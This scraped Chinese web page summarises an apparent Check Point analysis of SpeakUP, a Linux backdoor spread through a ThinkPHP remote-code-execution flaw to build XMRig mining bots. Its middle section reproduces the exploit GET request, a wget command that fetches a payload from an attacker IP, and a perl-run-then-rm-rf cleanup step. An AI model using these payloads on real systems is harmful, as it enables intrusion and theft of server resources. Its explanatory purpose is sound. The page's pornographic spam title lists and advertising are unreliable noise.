欧美一级特黄大片做受成人-亚洲成人一区二区电影-激情熟女一区二区三区-日韩专区欧美专区国产专区

帶你了解新型Linux服務(wù)器殺手——SpeakUP

  日前,全球屈指一首的Internet安全解決方案供應(yīng)商Check Point IT安全部門(mén)研究人員發(fā)現(xiàn)了一個(gè)通過(guò)目前Linux服務(wù)器漏洞植入后門(mén)木馬的黑客活動(dòng),此次攻擊的目標(biāo)涵蓋了包括AWS主機(jī)在內(nèi)的世界范圍的全部服務(wù)器。攻擊范圍涵蓋了共6個(gè)不同Linux發(fā)行版和macOS系統(tǒng)服務(wù)器中的已知漏洞,目前黑客的主要攻擊目標(biāo)集中在東亞與拉美地區(qū)的Linux服務(wù)器。

創(chuàng)新互聯(lián)建站專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù),包含不限于成都網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作、惠民網(wǎng)絡(luò)推廣、微信平臺(tái)小程序開(kāi)發(fā)、惠民網(wǎng)絡(luò)營(yíng)銷、惠民企業(yè)策劃、惠民品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營(yíng)等,從售前售中售后,我們都將竭誠(chéng)為您服務(wù),您的肯定,是我們大的嘉獎(jiǎng);創(chuàng)新互聯(lián)建站為所有大學(xué)生創(chuàng)業(yè)者提供惠民建站搭建服務(wù),24小時(shí)服務(wù)熱線:18982081108,官方網(wǎng)址:aaarwkj.com

  全球SpeakUP“受害者”分部

  這次的惡意攻擊的罪魁禍?zhǔn)妆幻麨镾peakUP,命名方式是以其中一臺(tái)命令與控制(C2)服務(wù)器名稱進(jìn)行命名的。據(jù)悉Check Point的研究人員發(fā)現(xiàn)SpeakUP通過(guò)Linux服務(wù)器漏洞來(lái)植入后門(mén)木馬的攻擊方式可以繞過(guò)目前所有安全產(chǎn)品,這是由于該惡意軟件中存儲(chǔ)了大量此前出現(xiàn)過(guò)的攻擊案例,致使SpeakUP可以優(yōu)先識(shí)別目前存在的安全漏洞,并成功繞過(guò)幾乎所有的殺毒軟件的“雙眼”。
  SpeakUP樣本采集
  在Check Point的分析報(bào)告中顯示,首次發(fā)現(xiàn)的SpeakUP樣本是今年1月14日在我國(guó)的服務(wù)器上發(fā)現(xiàn)的,該樣本曾在1月9日被上傳至VirusTotal網(wǎng)站(專業(yè)的免費(fèi)可疑文件分析服務(wù)網(wǎng)站)。但經(jīng)過(guò)嚴(yán)密的監(jiān)測(cè)后發(fā)現(xiàn),沒(méi)有一家安全產(chǎn)品將SpeakUP惡意軟件標(biāo)為惡意。

  這是因?yàn)闉榱颂颖馨踩珯z測(cè),SpeakUp的代碼采用了base64加鹽算法加密。不僅如此,C2通信也是采用了相同的方式加密。這也是為什么VirusTotal上的殺毒引擎無(wú)法將其檢測(cè)為惡意的原因所在。
  SpeakUP感染全過(guò)程:
  植入腳本階段
  根據(jù)Check Point報(bào)告中披露的數(shù)據(jù)來(lái)看,SpeakUP首先是利用ThinkPHP(輕量級(jí)PHP開(kāi)發(fā)框架)的一個(gè)漏洞為攻擊起點(diǎn),從中植入一個(gè)PHP shell腳本。
  使用GET請(qǐng)求(如下所示),通過(guò)ThinkPHP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2018-20062將shell腳本發(fā)送到目標(biāo)服務(wù)器:
  s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php
  這個(gè)shell腳本接下來(lái)會(huì)通過(guò)query中的“module”參數(shù)來(lái)執(zhí)行命令。
  植入后門(mén)階段
  在腳本生效之后,SpeakUP將進(jìn)行像服務(wù)器植入后門(mén)的操作
  發(fā)送另一個(gè)HTTP請(qǐng)求(如下所示)到目標(biāo)服務(wù)器:
  /?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
  實(shí)際上,這是一個(gè)注入過(guò)程,目的是植入ibus payload并將其存儲(chǔ)到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc
  啟動(dòng)后門(mén)并抹除痕跡階段
  在植入后門(mén)成功后,SpeakUP將對(duì)服務(wù)器發(fā)送請(qǐng)求,啟動(dòng)后門(mén),在啟動(dòng)后門(mén)后SpeakUP將通過(guò)刪除文件來(lái)清楚自己的感染痕跡。
  使用如下HTTP請(qǐng)求來(lái)執(zhí)行后門(mén):
  /?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc
  SpeakUP感染后果:
  在Linux服務(wù)器被感染后,SpeakUP使用POST和GET請(qǐng)求來(lái)與C2通信,C2是被黑的speakupomaha[.]com.。
  第一個(gè)post請(qǐng)求會(huì)發(fā)送受害者ID和其他介紹性的信息,比如安裝的腳本的當(dāng)前版本等。
  對(duì)應(yīng)的C2響應(yīng)是needrgr,表示受感染的受害者之前未在服務(wù)器上注冊(cè),需要注冊(cè)。
  之后,木馬會(huì)通過(guò)執(zhí)行以下的Linux命令來(lái)POST機(jī)器的全部信息:
  · Uname (-r, -v, -m, -n,-a, -s)
  · Whoami
  · Ifconfig –a
  · Arp –a
  · cat /proc/cpuinfo | grep -c “cpu family” 2>&1
  · who –b

  一旦受感染服務(wù)器注冊(cè)完成,C2服務(wù)器就會(huì)發(fā)送新的任務(wù)——不同的C2服務(wù)器會(huì)命名受感染服務(wù)器來(lái)下載和執(zhí)行不同的文件。
  有一個(gè)需要注意的點(diǎn)是,SpeakUP使用了User-Agent用戶代理。具體來(lái)說(shuō),SpeakUp定義了三個(gè)用戶代理,而受感染服務(wù)器在與C2服務(wù)器進(jìn)行通信時(shí)必須使用這些代理。其中兩個(gè)代理是MacOS X User-Agent,第三個(gè)是經(jīng)過(guò)哈希處理的字符串:
  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD
  Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
  E9BC3BD76216AFA560BFB5ACAF5731A3

  目前,SpeakUp主要服務(wù)于XMRig礦工,為其提供“肉雞(受感染服務(wù)器)”。根據(jù)XMRHunter網(wǎng)站的查詢結(jié)果顯示,攻擊者的錢(qián)包目前擁有約107枚門(mén)羅幣。
  SpeakUP強(qiáng)大的自我傳播能力
  攻擊者還為SpeakUp配備了一個(gè)“i”模塊,它實(shí)際上是一個(gè)python腳本,使得SpeakUP能夠掃描和感染位于受感染服務(wù)器所處內(nèi)網(wǎng)和外網(wǎng)的其他更多的Linux服務(wù)器。其主要功能有:
  使用預(yù)定義的用戶名和密碼來(lái)暴力破解嘗試登陸管理面板;
  掃描受感染服務(wù)器的網(wǎng)絡(luò)環(huán)境,檢測(cè)共享相同內(nèi)部和外部子網(wǎng)掩碼的服務(wù)器上的特定端口的可用性;
  嘗試?yán)媚繕?biāo)服務(wù)器上的遠(yuǎn)程代碼執(zhí)行漏洞

網(wǎng)頁(yè)標(biāo)題:帶你了解新型Linux服務(wù)器殺手——SpeakUP
鏈接分享:http://aaarwkj.com/article36/cioopg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站內(nèi)鏈、靜態(tài)網(wǎng)站、響應(yīng)式網(wǎng)站企業(yè)網(wǎng)站制作、小程序開(kāi)發(fā)網(wǎng)站排名

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

搜索引擎優(yōu)化
亚洲最色最黄大片在线视频| 国产精品大白屁股视频| 俩小伙探花专约老熟女| 色老头视频一区二区三区| 十八禁在线观看网址免费| 免费直接在线看亚洲黄色| 国产麻豆剧传媒精品av| 日本中文字幕免费专区| 欧美日韩亚洲高清专区| 欧美日韩国产在线91| 久久精品有码视频免费观看| 中出亚洲精品日韩在线视频| 97资源在线中文一区| 漂亮人妻中文字幕av| 蜜臀国产综合久久第一页| 国产精品一区二区欧美激情 | 最新手机免费黄色av网站| 国产日韩精品专区一区| 日韩国产精品激情一区| 91麻豆成人精品国产| 中文字幕日韩不卡顿一区二区| 日韩亚洲毛片全在线播放| 成人一区二区三区乱码| 国产天美剧情av一区二区| 亚洲成人免费在线一区| 欧美日韩免费r在线视频| 亚洲精品熟女av影院| 欧美亚日韩精品视频| 中文字幕伦理一区二区三区| 亚洲精品福利一二三区| 天天操夜夜骑日日干| 免费国产污网站在线观看| 国产性色精品一区二区| 国产乱国产乱老熟部视频| 国产精品一区二区一牛影视| 久久综合色爱综合欧美| 国产精品国产三级国av中文| 亚洲人成伊人成综合网中文| 国产第一页第二页在线| 亚洲成年人黄色小说网站| 伊人亚洲一区二区三区|